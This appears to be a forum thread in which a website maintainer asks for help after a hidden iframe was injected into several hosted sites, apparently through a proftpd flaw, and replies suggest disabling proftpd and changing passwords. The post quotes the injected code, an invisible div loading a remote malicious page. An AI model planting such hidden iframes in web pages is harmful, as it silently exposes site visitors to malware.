Member Avatar for kained

Not sure if this is in the right place but anyway........

A load of sites i help maintain have been having code added to them.

<div style="display:none"><iframe width=438 height=168 src="http://deathtesting.  ru:8080/index.php" ></iframe></div>

normally with a load of random divs as well.

I have found out from a random lLithuanian site that this is a proftpd service vulnerability.

Google has flagged the sites and is displaying warnings that our site may contain malware.

Any ideas how to get rid of it?

We are currently changing our FTP and control panel codes and i will get rid of the code and reupload again and see if that works but is there anything else that can be done?

The sites are hosted on 1&1 if that makes any difference.


Have tried removing the code and re-uploading.

  • 2 Contributors
  • 4 Replies
  • 113 Views
  • 3 Days Discussion Span
  • Latest Post Latest Post by kained

Recommended Answers

All 4 Replies

Member Avatar for BrianDSy

Until you can verify that the proftpd application has been patched you should disable it. The Fedora update for proftpd was published on the 24th. It may already be in place on your hosting service.

Member Avatar for kained

Thinks is okay now, just changed the FTP and control panel codes and reuploaded everything and it seems to be fine.

Member Avatar for BrianDSy

When you say you changed the FTP and control panel codes I am not sure what you mean. Did you mean you changed the passwords?

Member Avatar for kained

yes

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.